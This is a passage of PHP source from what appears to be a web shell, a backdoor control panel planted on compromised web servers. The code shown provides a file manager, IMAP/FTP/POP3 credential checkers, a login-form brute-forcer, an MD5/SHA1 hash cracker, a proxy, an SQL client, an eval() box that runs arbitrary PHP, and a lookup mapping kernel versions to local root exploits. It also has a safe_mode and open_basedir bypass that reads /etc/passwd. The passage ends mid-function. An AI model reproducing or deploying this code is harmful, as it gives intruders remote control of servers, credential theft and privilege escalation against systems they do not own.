$adate=date('Y/m/d H:i:s',fileatime($fn));
|
||
|
if($owner)$own="<a title='Shell:".$owner['shell']."' href='".hlinK('seC=fm&workingdiR='.$owner['dir'])."'>".$owner['name'].'</a>';
|
||
|
$size=showsizE(filesize($fn));
|
||
|
if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
|
||
|
if(is_writeable($fn))echo $tdw;elseif(!is_readable($fn))echo $tdnr;else echo $cl2;
|
||
|
echo "<a href='".hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."'>";
|
||
|
if(strlen($fn)>45)echo substr($fn,0,42).'...';else echo $fn;echo '</a>';
|
||
|
echo $cl1."$own</td>";
|
||
|
echo $cl1."$mdate</td>";
|
||
|
echo $cl1."$adate</td>";
|
||
|
echo "</td>$cl1";echo "<a href='#' onClick=\"javascript:chmoD('$fn')\" title='Change mode'>";if(is_readable($fn))echo "R";if(is_writeable($fn))echo "W";if(is_executable($fn))echo "X";if(is_uploaded_file($fn))echo "U";echo "</a></td>";
|
||
|
echo "$cl1$size</td>";
|
||
|
echo $cl2.$fileaction;
|
||
|
echo '</tr>';
|
||
|
}
|
||
|
foreach($link as $ln){
|
||
|
$own='Unknow';
|
||
|
$i++;
|
||
|
$owner=posix_getpwuid(fileowner($ln));
|
||
|
$linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."'>Open</option><option value='".hlinK("seC=edit&filE=$ln&workingdiR=$cwd")."'>Edit</option><option value='".hlinK("seC=fm&downloaD=$ln&workingdiR=$cwd")."'>Download</option><option value='".hlinK("seC=hex&filE=$ln&workingdiR=$cwd")."'>Hex view</option><option value='".hlinK("seC=img&filE=$ln&workingdiR=$cwd")."'>Image</option><option value='".hlinK("seC=inc&filE=$ln&workingdiR=$cwd")."'>Include</option><option value='".hlinK("seC=checksum&filE=$ln&workingdiR=$cwd")."'>Checksum</option><option value='".hlinK("seC=fm&workingdiR=$cwd&cP=$ln")."'>Copy</option><option value='".hlinK("seC=fm&workingdiR=$cwd&mV=$ln")."'>Move</option><option value='".hlinK("seC=fm&workingdiR=$cwd&rN=$ln")."'>Rename</option><option value='".hlinK("seC=fm&deL=$ln&workingdiR=$cwd")."'>Remove</option></select></td>";
|
||
|
$mdate=date('Y/m/d H:i:s',filemtime($ln));
|
||
|
$adate=date('Y/m/d H:i:s',fileatime($ln));
|
||
|
if($owner)$own="<a title='Shell: ".$owner['shell']."' href='".hlinK('seC=fm&workingdiR='.$owner['dir'])."'>".$owner['name'].'</a>';
|
||
|
echo '<tr>';
|
||
|
$size=showsizE(filesize($ln));
|
||
|
if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
|
||
|
if(is_writeable($ln))echo $tdw;elseif(!is_readable($ln))echo $tdnr;else echo $cl2;
|
||
|
echo "<a href='".hlinK("seC=openit&namE=$ln&workingdiR=$cwd")."'>";
|
||
|
if(strlen($ln)>45)echo substr($ln,0,42).'...';else echo $ln;echo '</a>';
|
||
|
echo $cl1."$own</td>";
|
||
|
echo $cl1."$mdate</td>";
|
||
|
echo $cl1."$adate</td>";
|
||
|
echo "</td>${cl1}";echo "<a href='#' onClick=\"javascript:chmoD('$ln')\" title='Change mode'>L";if(is_readable($ln))echo "R";if (is_writeable($ln))echo "W";if(is_executable($ln))echo "X";echo "</a></td>";
|
||
|
echo "$cl1$size</td>";
|
||
|
echo $cl2.$linkaction;
|
||
|
echo '</tr>';
|
||
|
}
|
||
|
}
|
||
|
$dc=count($dir)-2;
|
||
|
if($dc==-2)$dc=0;
|
||
|
$fc=count($file);
|
||
|
$lc=count($link);
|
||
|
$total=$dc+$fc+$lc;
|
||
|
$min=min(substr(ini_get('upload_max_filesize'),0,strpos(ini_get('post_max_size'),'M')),substr(ini_get('post_max_size'),0,strpos(ini_get('post_max_size'),'M'))).' MB';
|
||
|
echo "</table></div>$table<tr><td><form method=POST>Find:<input type=text value=\$pass name=search><input type=checkbox name=re value=1 style='border-width:1px;background-color:#333333;'>Regular expressions <input type=submit class=buttons value=Find>$hcwd<input type=hidden value=7 name=task></form></td><td><form method=POST>$hcwd<input type=hidden value='fm' name=seC><select name=task><option value=0>Display files and directories in current folder</option><option value=1>Find writable files and directories in current folder</option><option value=2>Find writable files in current folder</option><option value=3>Find writable directories in current folder</option><option value=4>Display all files in current folder</option><option value=5>Display all directories in current folder</option></select><input type=submit class=buttons value=Do></form>$et</tr></table><table width='100%'><tr><td width='50%'><br><table bgcolor=#333333 border=0 width='65%'><td><b>Summery:</b> Total: $total Directories: $dc Files: $fc Links: $lc$et<table bgcolor=#333333 border=0 width='65%'><td width='100%' bgcolor=";if (is_writeable($cwd)) echo '#006E00';elseif (!is_readable($cwd)) echo '#800000';else '#333333'; echo '>Current directory status: ';if (is_readable($cwd)) echo 'R';if (is_writeable($cwd)) echo 'W' ;echo "$et<table border=0 style='border-collapse: collapse' width='65%'><tr><td width='100%' bgcolor='#333333'>New:</td></tr><tr>$td1n<form method='POST'><input type=text size=47 name=newf></td></tr><tr>$td2m$hcwd<input class=buttons type=submit name=newfile value='File'><input class=buttons type=submit name=newdir value='Folder'></form>$et</td><td width='50%'><br>${t}Upload:</td></tr><tr>$td1n<form method='POST' enctype='multipart/form-data'><input type=file size=45 name=uploadfile></td></tr><tr>$td2m$hcwd<input class=buttons type=submit value=Upload></td></tr>$td1n Note: Max allowed file size to upload on this server is $min</form>$et$et";
|
||
|
}
|
||
|
}
|
||
|
function imapchecK($host,$username,$password,$timeout){
|
||
|
$sock=fsockopen($host,143,$n,$s,$timeout);
|
||
|
$b=uniqid('NJ');
|
||
|
$l=strlen($b);
|
||
|
if(!$sock)return -1;
|
||
|
fread($sock,1024);
|
||
|
fputs($sock,"$b LOGIN $username $password\r\n");
|
||
|
$res=fgets($sock,$l+4);
|
||
|
fclose($sock);
|
||
|
if($res=="$b OK")return 1;else return 0;
|
||
|
}
|
||
|
function ftpchecK($host,$username,$password,$timeout){
|
||
|
$ftp=ftp_connect($host,21,$timeout);
|
||
|
if(!$ftp)return -1;
|
||
|
$con=ftp_login($ftp,$username,$password);
|
||
|
if($con)return 1;else return 0;
|
||
|
}
|
||
|
function pop3checK($server,$user,$pass,$timeout){
|
||
|
$sock=fsockopen($server,110,$en,$es,$timeout);
|
||
|
if(!$sock)return -1;
|
||
|
fread($sock,1024);
|
||
|
fwrite($sock,"user $user\n");
|
||
|
$r=fgets($sock);
|
||
|
if($r{0}=='-')return 0;
|
||
|
fwrite($sock,"pass $pass\n");
|
||
|
$r=fgets($sock);
|
||
|
fclose($sock);
|
||
|
if($r{0}=='+')return 1;
|
||
|
return 0;
|
||
|
}
|
||
|
function formcrackeR(){
|
||
|
global $errorbox,$footer,$et,$hcwd;
|
||
|
if(!empty($_REQUEST['start'])){
|
||
|
if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;
|
||
|
$url=$_REQUEST['target'];
|
||
|
$uf=$_REQUEST['userf'];
|
||
|
$pf=$_REQUEST['passf'];
|
||
|
$sf=$_REQUEST['submitf'];
|
||
|
$sv=$_REQUEST['submitv'];
|
||
|
$method=$_REQUEST['method'];
|
||
|
$fail=$_REQUEST['fail'];
|
||
|
$dic=$_REQUEST['dictionary'];
|
||
|
$type=$_REQUEST['combo'];
|
||
|
$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';
|
||
|
if(!file_exists($dic))die("$errorbox Can not open dictionary.$et$footer");
|
||
|
$dictionary=fopen($dic,'r');
|
||
|
echo '<font color=blue>Cracking started...<br>';
|
||
|
while(!feof($dictionary)){
|
||
|
if($type){
|
||
|
$combo=trim(fgets($dictionary)," \n\r");
|
||
|
$user=substr($combo,0,strpos($combo,':'));
|
||
|
$pass=substr($combo,strpos($combo,':')+1);
|
||
|
}else{
|
||
|
$pass=trim(fgets($dictionary)," \n\r");
|
||
|
}
|
||
|
$url.="?$uf=$user&$pf=$pass&$sf=$sv";
|
||
|
$res=check_urL($url,$method,$fail,12);
|
||
|
if(!$res){echo "<font color=blue>U: $user P: $pass</font><br>";if($log)file_add_contentS($file,"U: $user P: $pass\r\n");if(!$type)break;}
|
||
|
}
|
||
|
fclose($dictionary);
|
||
|
echo 'Done!</font><br>';
|
||
|
}
|
||
|
else echo "<center><table border=0 style='border-collapse: collapse' width='434'><tr><td width='174' bgcolor='#333333'>HTTP Form cracker:</td><td bgcolor='#333333' width='253'></td></tr><form method='POST' name=form><tr><td width='174' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width='253'><input type=text name=dictionary size=35></td></tr><tr><td width='174' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='174' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width='174' bgcolor='#808080'>Action Page:</td><td bgcolor='#808080' width='253'><input type=text name=target value='http://".getenv('HTTP_HOST')."/login.php' size=35></td></tr><tr><td width='174' bgcolor='#666666'>Method:</td><td bgcolor='#666666' width='253'><select size='1' name='method'><option selected value='POST'>POST</option><option value='GET'>GET</option></select></td></tr><tr><td width='174' bgcolor='#808080'>Username field name:</td><td bgcolor='#808080' width='253'><input type=text name=userf value=user size=35></td></tr><tr><td width='174' bgcolor='#666666'>Password field name:</td><td bgcolor='#666666' width='253'><input type=text name=passf value=passwd size=35></td></tr><tr><td width='174' bgcolor='#808080'>Submit name:</td><td bgcolor='#808080' width='253'><input type=text value=login name=submitf size=35></td></tr><tr><td width='174' bgcolor='#666666'>Submit value:</td><td bgcolor='#666666' width='253'><input type=text value='Login' name=submitv size=35></td></tr><tr><td width='174' bgcolor='#808080'>Fail string:</td><td bgcolor='#808080' width='253'><input type=text name=fail value='Try again' size=35></td></tr><tr><td width='174' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> <input class=buttons type=submit name=start value=Start></form>$et</center>";
|
||
|
}
|
||
|
function hashcrackeR(){
|
||
|
global $errorbox,$t,$et,$hcwd;
|
||
|
if(!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){
|
||
|
if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;
|
||
|
$dictionary=fopen($_REQUEST['dictionary'],'r');
|
||
|
if($dictionary){
|
||
|
$hash=strtoupper($_REQUEST['hash']);
|
||
|
echo '<font color=blue>Cracking '.htmlspecialchars($hash).'...<br>';
|
||
|
$type=($_REQUEST['type']=='MD5')?'md5':'sha1';
|
||
|
while(!feof($dictionary)){
|
||
|
$word=trim(fgets($dictionary)," \n\r");
|
||
|
if($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";if($log)file_add_contentS($file,"$x\r\n");break;}
|
||
|
}
|
||
|
echo 'Done!</font>';
|
||
|
fclose($dictionary);
|
||
|
}
|
||
|
else{
|
||
|
echo "$errorbox Can not open dictionary.$et";
|
||
|
}
|
||
|
}
|
||
|
echo "<center>${t}Hash cracker:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Hash:</td><td bgcolor='#808080'><input type=text name=hash size=35></td></tr><tr><td width='20%' bgcolor='#666666'>Type:</td><td bgcolor='#666666'><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width='20%' bgcolor='#808080'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#808080;' checked>Log</td><td bgcolor='#808080'><input type=text name=logfilE size=25 value='".whereistmP().DIRECTORY_SEPARATOR.".log'> $hcwd <input class=buttons type=submit value=Start></form>$et</center>";
|
||
|
}
|
||
|
function pr0xy(){
|
||
|
global $errorbox,$et,$footer,$hcwd;
|
||
|
echo "<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><form method='POST'><tr><td width='20%'><b>Navigator: </b><input type=text name=urL size=140 value='";if(!!empty($_REQUEST['urL'])) echo 'http://www.edpsciences.org/htbin/ipaddress'; else echo htmlspecialchars($_REQUEST['urL']);echo "'>$hcwd<input type=submit class=buttons value=Go></form>$et";
|
||
|
if(!empty($_REQUEST['urL'])){
|
||
|
$u=parse_url($_REQUEST['urL']);
|
||
|
$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
|
||
|
$dir=dirname($file);
|
||
|
$con=getiT($_REQUEST['urL']);
|
||
|
$s=array("href=mailto"=>"HrEf=mailto","HREF=mailto"=>"HrEf=mailto","href='mailto"=>"HrEf=\"mailto","HREF=\"mailto"=>"HrEf=\"mailto","href=\'mailto"=>"HrEf=\"mailto","HREF=\'mailto"=>"HrEf=\"mailto","href=\"http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"HREF=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=http"=>"HrEf=".hlinK("seC=px&urL=http"),"HREF=http"=>"HrEf=".hlinK("seC=px&urL=http"),"href=\""=>"HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),"HREF=\""=>"HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),"href=\""=>"HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),'HREF="'=>'HrEf="'.hlinK("seC=px&urL=http://$host/$dir/"),"href="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),"HREF="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"));
|
||
|
$con=replace_stR($s,$con);
|
||
|
echo $con;
|
||
|
}
|
||
|
}
|
||
|
function sqlclienT(){
|
||
|
global $t,$errorbox,$et,$hcwd;
|
||
|
if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
|
||
|
$server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];
|
||
|
$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];
|
||
|
$res=querY($type,$server,$user,$pass,$db,$query);
|
||
|
if($res){
|
||
|
$res=str_replace('|-|-|-|-|-|','</td><td>',$res);
|
||
|
$res=str_replace('|+|+|+|+|+|','</td></tr><tr><td>',$res);
|
||
|
$r=explode('[+][+][+]',$res);
|
||
|
$r[1]=str_replace('[-][-][-]',"</td><td bgcolor='333333'>",$r[1]);
|
||
|
echo "<table border=0 bgcolor='666666' width='100%'></tr><tr><td bgcolor='333333'>".$r[1].'</tr><tr><td>'.$r[0]."$et<br>";
|
||
|
}
|
||
|
else{
|
||
|
echo "$errorbox Failed!$et<br>";
|
||
|
}
|
||
|
}
|
||
|
if(empty($_REQUEST['typE']))$_REQUEST['typE']='';
|
||
|
echo "<center>${t}SQL cilent:</td><form name=client method='POST'><td bgcolor='#333333'><select name=typE><option valut=MySQL onClick='document.client.serveR.disabled = false;' ";if ($_REQUEST['typE']=='MySQL')echo 'selected';echo ">MySQL</option><option valut=MSSQL onClick='document.client.serveR.disabled = false;' ";if ($_REQUEST['typE']=='MSSQL')echo 'selected';echo ">MSSQL</option><option valut=Oracle onClick='document.client.serveR.disabled = true;' ";if ($_REQUEST['typE']=='Oracle')echo 'selected';echo ">Oracle</option><option valut=PostgreSQL onClick='document.client.serveR.disabled = false;' ";if ($_REQUEST['typE']=='PostgreSQL')echo 'selected';echo ">PostgreSQL</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost'; echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value='";if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']);else echo 'root'; echo "' size=35></td><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text value='";if (isset($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);else echo '123456'; echo "' name=pasS size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Database:</td><td bgcolor='#808080'><input type=text value='";if (!empty($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']); echo "' name=dB size=35></td><tr><td width='20%' bgcolor='#666666'>Query:</td><td bgcolor='#666666'><textarea name=querY rows=5 cols=27>";if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES'; echo "</textarea></td></tr></tr><tr><td width='20%' bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value='Submit Query'></form>$et</center>";
|
||
|
}
|
||
|
function querY($type,$host,$user,$pass,$db='',$query){
|
||
|
$res='';
|
||
|
switch($type){
|
||
|
case 'MySQL':
|
||
|
if(!function_exists('mysql_connect'))return 0;
|
||
|
$link=mysql_connect($host,$user,$pass);
|
||
|
if($link){
|
||
|
if(!empty($db))mysql_select_db($db,$link);
|
||
|
$result=mysql_query($query,$link);
|
||
|
while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
|
||
|
$res.='[+][+][+]';
|
||
|
for($i=0;$i<mysql_num_fields($result);$i++)
|
||
|
$res.=mysql_field_name($result,$i).'[-][-][-]';
|
||
|
mysql_close($link);
|
||
|
return $res;
|
||
|
}
|
||
|
break;
|
||
|
case 'MSSQL':
|
||
|
if(!function_exists('mssql_connect'))return 0;
|
||
|
$link=mssql_connect($host,$user,$pass);
|
||
|
if($link){
|
||
|
if(!empty($db))mssql_select_db($db,$link);
|
||
|
$result=mssql_query($query,$link);
|
||
|
while($data=mssql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
|
||
|
$res.='[+][+][+]';
|
||
|
for($i=0;$i<mssql_num_fields($result);$i++)
|
||
|
$res.=mssql_field_name($result,$i).'[-][-][-]';
|
||
|
mssql_close($link);
|
||
|
return $res;
|
||
|
}
|
||
|
break;
|
||
|
case 'Oracle':
|
||
|
if(!function_exists('ocilogon'))return 0;
|
||
|
$link=ocilogon($user,$pass,$db);
|
||
|
if($link){
|
||
|
$stm=ociparse($link,$query);
|
||
|
ociexecute($stm,OCI_DEFAULT);
|
||
|
while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
|
||
|
$res.='[+][+][+]';
|
||
|
for($i=0;$i<oci_num_fields($stm);$i++)
|
||
|
$res.=oci_field_name($stm,$i).'[-][-][-]';
|
||
|
return $res;
|
||
|
}
|
||
|
break;
|
||
|
case 'PostgreSQL':
|
||
|
if(!function_exists('pg_connect'))return 0;
|
||
|
$link=pg_connect("host=$host dbname=$db user=$user password=$pass");
|
||
|
if($link){
|
||
|
$result=pg_query($link,$query);
|
||
|
while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
|
||
|
$res.='[+][+][+]';
|
||
|
for($i=0;$i<pg_num_fields($result);$i++)
|
||
|
$res.=pg_field_name($result,$i).'[-][-][-]';
|
||
|
pg_close($link);
|
||
|
return $res;
|
||
|
}
|
||
|
break;
|
||
|
}
|
||
|
return 0;
|
||
|
}
|
||
|
function phpevaL(){
|
||
|
global $t,$hcwd,$et;
|
||
|
echo '<center>';
|
||
|
if(!empty($_REQUEST['code'])){
|
||
|
$s=array('<?php'=>'','<?'=>'','?>'=>'');
|
||
|
echo "<textarea rows='10' cols='64'>";echo htmlspecialchars(eval(replace_stR($s,$_REQUEST['code'])));echo '</textarea><br><br>';
|
||
|
}
|
||
|
echo "${t}Evaler:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Codes:</td><td bgcolor='#666666'><textarea rows='10' name='code' cols='64'>";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "</textarea></td></tr><tr><td width='20%' bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit value=Execute></form>$et</center>";
|
||
|
}
|
||
|
function rootxpL(){
|
||
|
$v=php_uname();
|
||
|
$db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip');
|
||
|
foreach($db as $k=>$x)if(strstr($v,$k))return $x;
|
||
|
return 0;
|
||
|
}
|
||
|
function toolS(){
|
||
|
global $t,$hcwd,$et,$cwd;
|
||
|
if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['domaiN'])){
|
||
|
$ser=fsockopen($_REQUEST['serveR'],43,$en,$es,5);
|
||
|
fputs($ser,$_REQUEST['domaiN']."\r\n");
|
||
|
echo '<pre>';
|
||
|
while(!feof($ser))echo fgets($ser,1024);
|
||
|
echo '</pre>';
|
||
|
fclose($ser);
|
||
|
}
|
||
|
elseif(!empty($_REQUEST['urL'])){
|
||
|
$h='';
|
||
|
$u=parse_url($_REQUEST['urL']);
|
||
|
$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port'];
|
||
|
$ser=fsockopen($host,$port,$en,$es,5);
|
||
|
if($ser){
|
||
|
fputs($ser,"GET $file\r\nHost: $host\r\n\r\n");
|
||
|
echo '<pre>';
|
||
|
while($h!="\r\n"){$h=fgets($ser,1024);echo $h;}
|
||
|
echo '</pre>';
|
||
|
fclose($ser);
|
||
|
}
|
||
|
}
|
||
|
elseif(!empty($_REQUEST['ouT']) && isset($_REQUEST['pW'])&& !empty($_REQUEST['uN'])){
|
||
|
$htpasswd=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htpasswd';
|
||
|
$htaccess=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htaccess';
|
||
|
file_put_contents($htpasswd,$_REQUEST['uN'].':'.crypt(trim($_REQUEST['pW']),CRYPT_STD_DES));
|
||
|
file_put_contents($htaccess,"AuthName \"Secure\"\r\nAuthType Basic\r\nAuthUserFile $htpasswd\r\nRequire valid-user\r\n");
|
||
|
echo '<font color=blue>Done</font>';
|
||
|
}
|
||
|
$s="</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>";
|
||
|
echo "<center>${t}WhoIs:${s}Server:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'whois.geektools.com'; echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>domain:</td><td bgcolor='#808080'><input type=text name=domaiN value='";if (!empty($_REQUEST['domaiN'])) echo htmlspecialchars($_REQUEST['domaiN']); else echo 'google.com'; echo "' size=35></td><tr><td bgcolor='#666666'></td><td bgcolor='#666666' align=right>$hcwd<input class=buttons type=submit value='Do'></form>$et<br>${t}.ht* generator:${s}Username:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['uN'])) echo htmlspecialchars($_REQUEST['uN']);else echo 'r00t'; echo "' name=uN size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Password:</td><td bgcolor='#808080'><input type=text name=pW value='";if (!empty($_REQUEST['pW'])) echo htmlspecialchars($_REQUEST['pW']); else echo uniqid('@'); echo "' size=35></td><tr><td width='20%' bgcolor='#666666'>Directory:</td><td bgcolor='#666666'><input type=text name=ouT value='";if (!empty($_REQUEST['ouT'])) echo htmlspecialchars($_REQUEST['ouT']); else echo $cwd; echo "' size=35></td><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value=Make></form>$et<br>${t}Grab header:${s}URL:</td><td bgcolor='#666666'><input type=text value='";if (!empty($_REQUEST['urL']))echo htmlspecialchars($_REQUEST['urL']);else echo 'http://netjackal.by.ru/index.htm'; echo "' name=urL size=35></td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>$hcwd<input class=buttons type=submit value='Get'></form>$et<br></center>";
|
||
|
}
|
||
|
function hexvieW(){
|
||
|
if(!empty($_REQUEST['filE'])){
|
||
|
$f=$_REQUEST['filE'];
|
||
|
echo "<table border=0 style='border-collapse: collapse' width='100%'><td width='10%' bgcolor='#282828'>Offset</td><td width='25%' bgcolor='#282828'>Hex</td><td width='25%' bgcolor='#282828'></td><td width='40%' bgcolor='#282828'>ASCII</td></tr>";
|
||
|
$file=fopen($f,'r');
|
||
|
$i=-1;
|
||
|
while(!feof($file)){
|
||
|
$ln='';
|
||
|
$i++;
|
||
|
echo "<tr><td width='10%' bgcolor='#";
|
||
|
if($i % 2==0)echo '666666';else echo '808080';
|
||
|
echo "'>";echo str_repeat('0',(8-strlen($i*16))).$i*16;echo '</td>';
|
||
|
echo "<td width='25%' bgcolor='#";
|
||
|
if($i % 2==0)echo '666666';else echo '808080';
|
||
|
echo "'>";
|
||
|
for($j=0;$j<=7;$j++){
|
||
|
if(!feof($file)){
|
||
|
$tmp=strtoupper(dechex(ord(fgetc($file))));
|
||
|
if(strlen($tmp)==1)$tmp='0'.$tmp;
|
||
|
echo $tmp.' ';
|
||
|
$ln.=$tmp;
|
||
|
}
|
||
|
}
|
||
|
echo "</td><td width='25%' bgcolor='#";
|
||
|
if($i % 2==0)echo '666666';else echo '808080';
|
||
|
echo "'>";
|
||
|
for($j=7;$j<=14;$j++){
|
||
|
if(!feof($file)){
|
||
|
$tmp=strtoupper(dechex(ord(fgetc($file))));
|
||
|
if(strlen($tmp)==1)$tmp='0'.$tmp;
|
||
|
echo $tmp.' ';
|
||
|
$ln.=$tmp;
|
||
|
}
|
||
|
}
|
||
|
echo "</td><td width='40%' bgcolor='#";
|
||
|
if($i % 2==0)echo '666666';else echo '808080';
|
||
|
echo "'>";
|
||
|
$n=0;$asc='';$co=0;
|
||
|
for($k=0;$k<=16;$k++){
|
||
|
$co=hexdec(substr($ln,$n,2));
|
||
|
if(($co<=31)||(($co>=127)&&($co<=160)))$co=46;
|
||
|
$asc.=chr($co);
|
||
|
$n+=2;
|
||
|
}
|
||
|
echo htmlspecialchars($asc);
|
||
|
echo '</td></tr>';
|
||
|
}
|
||
|
}
|
||
|
fclose($file);
|
||
|
echo '</table>';
|
||
|
}
|
||
|
function safemodE(){
|
||
|
global $windows,$t,$hcwd,$et;
|
||
|
$file=(empty($_REQUEST['file']))?'/etc/passwd':$_REQUEST['file'];
|
||
|
$pr="\r\n</font><font color=green>Method ";
|
||
|
$po=")</font><font color=blue>\r\n";
|
||
|
$i=1;
|
||
|
if(!empty($_REQUEST['read'])){
|
||
|
echo "<pre>$pr$i:(ini_restore$po";
|
||
|
ini_restore('safe_mode');ini_restore('open_basedir');
|
||
|
readfile($file);
|
||
|
$i++;
|
||
|
echo "$pr$i:(include$po";
|
||
|
include($file);
|
||
|
$i++;
|
||
|
echo "$pr$i:(copy$po";
|
||
|
$tmp=tempnam('','cx');
|
||
|
copy('compress.zlib://'.$file,$tmp);
|
||
|
$fh=fopen($tmp,'r');
|
||
|
$data=fread($fh,filesize($tmp));
|
||
|
fclose($fh);
|
||
|
echo $data;
|
||
|
$i++;
|
||
|
if(function_exists('mb_send_mail')){
|
||
|
echo "$pr$i:(mb_send_mail$po";
|
||
|
if(file_exists('/tmp/mb_send_mail'))unlink('/tmp/mb_send_mail');
|
||
|
